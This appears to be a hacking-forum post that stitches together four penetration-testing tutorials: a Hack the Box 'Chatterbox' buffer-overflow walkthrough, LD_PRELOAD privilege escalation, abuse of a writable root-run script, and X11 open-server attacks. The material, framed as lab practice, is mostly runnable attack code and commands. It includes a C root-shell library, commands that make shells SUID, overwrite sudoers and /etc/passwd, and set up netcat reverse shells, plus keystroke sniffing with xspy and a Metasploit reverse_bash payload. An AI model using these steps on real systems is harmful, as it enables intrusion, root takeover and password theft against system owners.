Login

**NINZA** · 05-14-2020, 08:58 AM

0			0

Today we are going to solve another CTF challenge “Chatterbox” which is categories as retired lab presented by Hack the Box for making online penetration practices.
Level: Easy
Task: find user.txt and root.txt file on the victim’s machine.
Penetrating Methodology

Scanning
Open ports and Running Services
Identify Vulnerable service
Exploiting vulnerable service (Metasploit)
Get user.txt
Get root.txt

Walkthrough
Since these labs are online accessible therefore they have static IP. The IP of chatterbox is 10.10.10.74 so let’s initiate with nmap port enumeration.
nmap -p1-10000 10.10.10.74
1
nmap -p1-10000 10.10.10.74
It has shown two ports are open but didn’t disclose running services through them.
[Image: 1.png?w=687&ssl=1]

Therefore we took help from Google and asked to look for any exploit related to these port as shown in the below image. So it put up two exploits related to Achat. First, we tried Metasploit exploit to compromise victim’s machine and almost successfully seized meterpreter session, but the session was getting died in few seconds.
Thus we choose the manual technique to compromise the victim’s machine by using exploit DB 36025.
[Image: 2.png?w=687&ssl=1]

Exploit 36025 is already stored inside Kali Linux and we have copied it on the Desktop.
cd Desktop
cp /usr/share/exploitdb/exploits/windows/remote/36025.py .
cat 36025.py
1
2
3
cd Desktop
cp /usr/share/exploitdb/exploits/windows/remote/36025.py .
cat 36025.py
According to this python script, it is exploitable to Buffer overflow and highlighted msfvenom code is used to generate payload.
[Image: 12.png?w=687&ssl=1]

With the help of the above script, we execute the following command to generate payload.
Then copied the generated shellcode.
[Image: 15.png?w=687&ssl=1]

Now open the original 36025.py which you have saved on the desktop and paste above-copied shellcode here and then enter victim’s IP (10.10.10.74) as Server_address. Now start Netcat for reverse connection before running this script.
nc -lvp 1234
1
nc -lvp 1234
[Image: 16.png?w=687&ssl=1]

Now run your python script to lunch Buffer overflow attack on victim’s machine.
python 36025.py
1
python 36025.py

BOOM!! Here we command shell of victim’s machine. Let’s finish this task by grabbing both flags.
[Image: 20.png?w=687&ssl=1]

Inside C:\Users\Alfred\Desktop we found user.txt flag used type “filename” command for reading this file.
cd Desktop
type user.txt
1
2
cd Desktop
type user.txt
Great!! We got our 1st flag successfully
[Image: 21.png?w=687&ssl=1]

Inside C:\Users\Administrator\Desktop I found the root.txt file and type “filename” command for reading this file.
cd Desktop
type root.txt
1
2
cd Desktop
type root.txt
But this file didn’t open due to less permission.
[Image: 22.png?w=687&ssl=1]

With help of following cacls command, we can observe the permission and can change the file’s permissions where we had granted read operate to User: Alfred for the root.txt file.
cacls C:\Users\Administrator\Desktop
cacls root.txt /g Alfred:r
type root.txt
1
2
3
cacls C:\Users\Administrator\Desktop
cacls root.txt /g Alfred:r
type root.txt
Congratulation!! 2nd Task is also completed
[Image: 23.png?w=687&ssl=1]

In this Post, we are going to discuss a new technique of privilege escalation by exploiting an environment variable “LD_Preload” but to practice this you must take some help from our previous

[To see content please register here]

.
Table of contents

Introduction
Shared Libraries
Shared Libraries Names
LD_Preload
Lab setup
Privilege Escalation

Introduction
Shared Libraries
Shared libraries are libraries that are loaded by programs when they start. When a shared library is installed properly, all programs that start afterward automatically use the new shared library.
Shared Libraries Names
Every shared library has a special name called the “soname”. The soname has the prefix “lib”, the name of the library, the phrase `”.so”, followed by a period and a version number.
The dynamic linker can be run either indirectly by running some dynamically linked program or shared object. The programs ld.so and ld-linux.so* find and load the shared objects (shared libraries) needed by a program, prepare the program to run, and then run it. (read from here)
LD_Preload: It is an environment variable that lists shared libraries with functions that override the standard set, just as /etc/ld.so.preload does. These are implemented by the loader /lib/ld-linux.so
For more information read from

[To see content please register here]

.
Lab setup
It is important that logged user must have some sudo rights, therefore, we have given some sudo rights such as /usr/bin/find to be executed by sudo user. But apart from that, there is some Default specification where you can set an environment variable to work as sudo.
To do this follow the below steps:

Open /etc/sudoers file by typing visudo
Now give some sudo rights to a user, in our case “raj” will be members of sudoers.

raj ALL=(ALL:ALL) NOPASSWD: /usr/bin/find
1
raj ALL=(ALL:ALL) NOPASSWD: /usr/bin/find

Then add the following as default specification to set the environment for LD_preload.

Defaults env_keep += LD_PRELOAD
1
Defaults env_keep += LD_PRELOAD
[Image: 2.png?w=687]

Privilege Escalation
To exploit such type of vulnerability we need to compromise victim’s machine at once then move to privilege escalation phase. Suppose you successfully login into victim’s machine through ssh now for post exploitation type sudo -l command to detect it. And notice the highlighted environment variable will work as sudo.
[Image: 3.png?w=687]

Let’s generate a C-program file inside /tmp directory.
[Image: 4.png?w=687]

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/sh");
}
1
2
3
4
5
6
7
8
9
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/sh");
}
Then save it as shell.c inside /tmp.
[Image: 5.png?w=687]

As discussed let’s compile it to generate a shared object with .so extension likewise .dll file in the Windows operating system and hence type following:
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
ls -al shell.so
sudo LD_PRELOAD=/tmp/shell.so find
id
whoami
1
2
3
4
5
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
ls -al shell.so
sudo LD_PRELOAD=/tmp/shell.so find
id
whoami
Yuppieeee!!!! We got the ROOT access.
[Image: 6.png?w=687]

In Linux, everything is a file, including directories and devices that have permissions to allow or restricted three operations i.e. read/write/execute. When admin set permission for any file, he should be aware of Linux users to whom he is going to allow or restrict all three permissions.
In this article, we are going to discuss Linux privilege escalation through writable file/script. To know more about Linux system permission to read this

[To see content please register here]

.
Table of content
Methods to Escalate root via writable script

Copy /bin/sh inside /tmp
Set SUID bit for /bin/dash
Give ALL permission to logged user through sudoers
Set SUID bit for /bin/cp
Malicious code for reverse connection.

Let’s start!!!
Start your attacking machine and first compromise the target system and then move to privilege escalation stage. Suppose I successfully login into victim’s machine through ssh and access non-root user terminal. Then by using the following command, we can enumerate all binaries having writable permission.
find / -writable -type f 2>/dev/null | grep -v "/proc/"
1
find / -writable -type f 2>/dev/null | grep -v "/proc/"
As you can observe that it has shown a python file which is stored inside /lib/log. When we explored that path we notice permission 777 for sanitizer.py
[Image: 10.png?w=687&ssl=1]

So here the following script was added by admin to clean up all junk file from inside /tmp and these type of files depends upon specific time interval for executions.
Now if an attack identifies such types of situation in the victim’s machine then he can destroy his system by escalating root privileges in the following ways:
[Image: 11.png?w=687&ssl=1]

1st Method
There so many methods to gain root access as in this method we copied /bin/sh inside /tmp and enabled SUID for /tmp/sh. It is quite simple, first, open the file through some editor for example nano sanitizer.pyn and replace “rm -r /tmp/*” from the following line as given below
os.system('cp /bin/sh /tmp/sh')
os.system('chmod u+s /tmp/sh')
1
2
os.system('cp /bin/sh /tmp/sh')
os.system('chmod u+s /tmp/sh')
[Image: 13.png?w=687&ssl=1]

After some time it will create a script file inside /tmp directory with SUID permission and when you will run it, you will give root access.
cd /tmp
ls
./sh
id
whoami
1
2
3
4
5
cd /tmp
ls
./sh
id
whoami
As you can confirm this from given below image.
[Image: 14.png?w=687&ssl=1]

2nd Method
Similarly, you can also replace “rm -r /tmp/*” from the following line as given below.
os.system('chmod u+s /bin/dash')
1
os.system('chmod u+s /bin/dash')
[Image: 15.png?w=687&ssl=1]

After some time it will set SUID permission for /bin/dash and when you will run it will give root access.
/bin/dash
id
1
2
/bin/dash
id
As you can confirm this from given below image.
[Image: 16.png?w=687&ssl=1]

3rd Method
In this method, we have pasted python reverse shell connection code at the place of rm -r /tmp/* and start netcat listener in a new terminal.
[Image: 17.png?w=687&ssl=1]

And as said above after some time we got the reverse connection through netcat and root access.
nc -lvp 1234
id
whoami
1
2
3
nc -lvp 1234
id
whoami
As you can confirm this from given below image.
[Image: 18.png?w=687&ssl=1]

4th Method
Another most interesting method is to give sudo right to the logged users by making him sudoers file member. If you will notice below image then you can ensure that currently user: wernerbrandes may not run sudo command.
[Image: 19.png?w=687&ssl=1]

Similarly you can also replace “rm -r /tmp/*” from following line as given below.
os.system('echo "wernerbrandes ALL=(ALL) NOPASSWD: ALL" > /etc/sudoers')
1
os.system('echo "wernerbrandes ALL=(ALL) NOPASSWD: ALL" > /etc/sudoers')
[Image: 20.png?w=687&ssl=1]

And after some time, when you will type “sudo -l” command then you will notice, it becomes the member of sudo users. To take root access type “sudo bash” and enjoy the root access.
sudo -l
sudo bash
id
1
2
3
sudo -l
sudo bash
id

5th Method
As we all know how much important role play by passwd in any Linux like the system and if an attacker gets the chance to modify this file, it becomes a dynamic way of privilege escalation.
Similarly, we will try something like this BUT with help of the writable script, here by using cat command we can etc/passwd file.
Here you can observe the highlighted entry for user: nemo records, as per my guessing UID:1000 & GID:1000 indicates it would be a member of admin group.
However, we want to edit nemo record to make him a member of the root, therefore, select the whole content of etc/passwd and copy it and then paste into empty text file.
[Image: 22.png?w=687&ssl=1]

After then in a new terminal generate a salt password with help of openssl as shown and copy it.
openssl passwd -1 -salt abc 123
1
openssl passwd -1 -salt abc 123
[Image: 23.png?w=687&ssl=1]

Now paste above-copied salt password at the place of “X” in the record entry of user nemo and also change previous UID&GID with 0:0 as shown in the given image. Once above said all steps are completed save the text file as “passwd” because when you will transfer this file to victim’s machine it will overwrite the content of the original passwd file.
cd Desktop
python -m SimpleHTTPServer 80
1
2
cd Desktop
python -m SimpleHTTPServer 80
[Image: 24.png?w=687&ssl=1]

Now taking advantage of writable script replace “rm -r /tmp/*” from the following line as given below.
os.system('chmod u+s /bin/cp')
1
os.system('chmod u+s /bin/cp')
After some time it will enable SUID bit for /bin/cp to copy any file.
[Image: 25.png?w=687&ssl=1]

Now download your modified passwd file inside /tmp directory of victim’s machine. Let’s check whether SUID bit gets enabled for /bin/cp or not with help of the following command after then copy modify passwd file into /etc/passwd with help of cp command which will overwrite the content of original passwd file.
cd /tmp
wget

[To see content please register here]

ls -al /bin/cp
cp passwd /etc/passwd
1
2
3
4
cd /tmp
wget

[To see content please register here]

ls -al /bin/cp
cp passwd /etc/passwd
[Image: 26.png?w=687&ssl=1]

Now let confirm whether we have successfully manipulated the content of passwd file or not with help of the following command.
tail /etc/passwd
1
tail /etc/passwd
Wonderful!!! You can observe the following changes has now become part of the passwd file.
[Image: 27.png?w=687&ssl=1]

Now let take root access by executing the following command:
su nemo
password 123
whoami
1
2
3
su nemo
password 123
whoami
So today we have demonstrated how an attacker can lead to privilege escalation through the writable file.
[Image: 28.png?w=687&ssl=1]

X is an architecture-independent system for remote graphical user interfaces and input device capabilities. Each person using a networked terminal has the ability to interact with the display with any type of user input device.
Source:

[To see content please register here]

In most cases, the X Server’s access control is disabled. But if enabled, it allows anyone to connect to the server. This Vulnerability is called X11 Server Unauthenticated Access Open. You can get more information from

[To see content please register here]

.
For a proper demonstration, we will have to set up an X11 Lab with this Vulnerability.
Lab Setup
We will use an Ubuntu 14.04 system for this Vulnerable Lab setup. After the basic installation of the Ubuntu Server(LAMP), we will focus on locating the “lightdm.conf” file.
The Location of this file is: /etc/lightdm/lightdm.conf.
But if you can’t seem to find this at that location, you can get it for yourself from

[To see content please register here]

.
NOTE: As all the files we are going to edit are accessible to the root user and the commands we are going to run are also for the root user. So to avoid the usage of sudo again and again, we are using a root terminal. To get the root terminal run “sudo bash” command in your terminal.
To edit the file, we will use gedit.
gedit /etc/lightdm/lightdm.conf
1
gedit /etc/lightdm/lightdm.conf
[Image: 1.png?w=687&ssl=1]

To create vulnerability, we will uncomment the following line in lightdm.conf as shown below :
xserver-allow-tcp=true
1
xserver-allow-tcp=true
[Image: 2.png?w=687&ssl=1]

Now that we have saved the changes made in the conf file, to make them come in effect, we will restart the lightdm service.
service lightdm restart
1
service lightdm restart
[Image: 3.png?w=687&ssl=1]

Now when the lightdm service restarts, we will disable the access control with the following command. This will allow clients on the network to get connected to the server.
xhost +
1
xhost +
And That’s it. We have successfully created the X11 Vulnerable Server.
[Image: 4.png?w=687&ssl=1]

Penetration Testing of X11 Server
To begin Penetration Testing, we will start with the enumeration of the Vulnerable Server. To do a port enumeration we will use the nmap tool.

nmap -sV 192.168.1.109
1
nmap -sV 192.168.1.109
[Image: 5.png?w=687&ssl=1]

As we can see from the image that we have the TCP port 6000 open on the Server (192.168.1.109). Also, it is running the X11 service on that port.
Nmap has a script, which checks if the attacker is allowed to connect to the X Server. We can check if the X Server allows us the connection as shown below.
nmap 192.168.1.109 -p 6000 --script x11-access
1
nmap 192.168.1.109 -p 6000 --script x11-access
We can clearly see from the image provided that the X Server allows us access.
[Image: 6.png?w=687&ssl=1]

XWININFO
This is the built-in utility in Kali, it shows the window’s information for X Service. xwininfo can be used to get information about the windows opened on the target system.
xwininfo -root -tree -display 192.168.1.109:0
1
xwininfo -root -tree -display 192.168.1.109:0

Root = specifies that X’s root window is the target window
Tree = displays the names of the windows
Display = specify the server to connect to

We can extract much information from the screenshot like:

The victim has Gnome Terminal Opened
The victim is a VMware user
The victim has Nautilus (Ubuntu File Browser) Opened

XWD
It is an X Window System utility that helps in taking screenshots. On our Kali System, we will use the xwd to take the screenshot of Xserver. This utility takes the screenshots in xwd format.
xwd -root -screen -silent -display 192.168.1.109:0 > screenshot.xwd
1
xwd -root -screen -silent -display 192.168.1.109:0 > screenshot.xwd
Root = indicates that the root window should be selected for the window dump
Screen = indicates that the GetImage request used to obtain the image
Silent = Operate silently, i.e. don’t ring any bells before and after dumping the window.
Display = specify the server to connect to
[Image: 8.png?w=687&ssl=1]

After running the aforementioned command, we will successfully capture a screenshot from the victim system.
[Image: 9.png?w=687&ssl=1]

Here we have the screenshot captured by the xwd, but it is in .xwd format, so to view it we will have to convert it to a viewable format like .png
convert screenshot.xwd screenshot.png
1
convert screenshot.xwd screenshot.png
[Image: 10.png?w=687&ssl=1]

This command will convert the xwd to a png file. After running this command, we can find out screenshot in the png file format as shown below:
[Image: 11.png?w=687&ssl=1]

On opening the png file we can see that the xwd tool has successfully captured the screenshot of the target system.
[Image: 12.png?w=687&ssl=1]

XSPY
It is a built-in tool Kali Linux for the X Window Servers. XSPY is a sniffer, it sniffs keystrokes on the remote or local X Server.
xspy 192.168.1.109
1
xspy 192.168.1.109
[Image: 13.png?w=687&ssl=1]

As we can see from the given screenshot that we got the user password as the victim have unknowingly entered the password. Also, see that the password is not visible on the Server terminal but as the xspy captures the keys typed, hence we have the password typed.
[Image: 14.png?w=687&ssl=1]

Getting the Shell through Metasploit
Now we will use the X11 Keyboard Command Injection module of the Metasploit Framework. This module exploits open X11 Server by connecting and registering a virtual keyboard. Then the Virtual Keyboard is used to open an xterm or gnome-terminal and then type and execute the payload.
NOTE: As X Server is a visual service, while the executing of the module will take place, every task occurring on the Target System will be visible to the Victim.
Now, after opening the Metasploit Framework, we will use the payload as shown:
use unix/x11/x11_keyboard_exec
msf exploit(unix/x11x11_keyboard_exec) > set rhost 192.168.1.109
msf exploit(unix/x11x11_keyboard_exec) > set payload cmd/unix/reverse_bash
msf exploit(unix/x11x11_keyboard_exec) > set lhost 192.168.1.120
msf exploit(unix/x11x11_keyboard_exec) > set lport 4444
msf exploit(unix/x11x11_keyboard_exec) > set time_wait 10
msf exploit(unix/x11x11_keyboard_exec) > run
1
2
3
4
5
6
7
use unix/x11/x11_keyboard_exec
msf exploit(unix/x11x11_keyboard_exec) > set rhost 192.168.1.109
msf exploit(unix/x11x11_keyboard_exec) > set payload cmd/unix/reverse_bash
msf exploit(unix/x11x11_keyboard_exec) > set lhost 192.168.1.120
msf exploit(unix/x11x11_keyboard_exec) > set lport 4444
msf exploit(unix/x11x11_keyboard_exec) > set time_wait 10
msf exploit(unix/x11x11_keyboard_exec) > run
[Image: 15.png?w=687&ssl=1]

After running the module, it will first connect to the Server and search for xterm and open it.
[Image: 16.PNG?w=687&ssl=1]

Then after waiting for 10 seconds as its the wait time we gave earlier, it will start typing the script command on the xterm.
[Image: 17.png?w=687&ssl=1]

After executing this command, xterm will get closed, but it will provide a command shell to the Attacker as shown.
[Image: 18.png?w=687&ssl=1]

Login
Username: Password: Lost Password? Remember me
Or Register an account

Announcement : For Purchasing Advertising Contact Us | Jabber : [email protected] | Telegram :- @bhcis

Announcement :

For Purchasing Advertising Contact Us | Jabber : [email protected] | Telegram :- @bhcis